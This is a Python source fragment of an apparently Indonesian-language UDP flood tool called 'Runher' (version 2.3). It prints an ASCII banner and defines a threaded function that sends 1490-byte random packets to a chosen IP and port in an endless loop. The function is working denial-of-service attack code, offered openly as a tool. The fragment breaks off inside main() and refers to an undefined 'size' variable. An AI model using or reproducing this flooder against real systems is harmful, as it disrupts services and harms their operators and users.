def banner():
    print(f"""\033[2;31m
     
██████╗░██╗░░░██╗███╗░░██╗██╗░░██╗███████╗██████╗░
██╔══██╗██║░░░██║████╗░██║██║░░██║██╔════╝██╔══██╗
██████╔╝██║░░░██║██╔██╗██║███████║█████╗░░██████╔╝
██╔══██╗██║░░░██║██║╚████║██╔══██║██╔══╝░░██╔══██╗
██║░░██║╚██████╔╝██║░╚███║██║░░██║███████╗██║░░██║
╚═╝░░╚═╝░╚═════╝░╚═╝░░╚══╝╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝{random_phrase()}

    \033[2;33mVersion: 2.3 \t Author : Runher \n\033[0m
    """)

def Runher(ip, port, packet, index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        sock.sendto(random._urandom(1490), (ip, port))
        print(f"\033[1;34m[THREAD {index}] \033[0m\xBB \033[1;35m{size}\033[0m Mengirim Paket Ke Ip And Port \033[1;35m{ip}\033[0m")

def main():
    try:
        if sys.version_info[0] != 3:
            print("\033[1;31m[Kesalahan] \033[0m\xBB Silakan jalankan Tools Ini menggunakan Python 3")
            sys.exit()
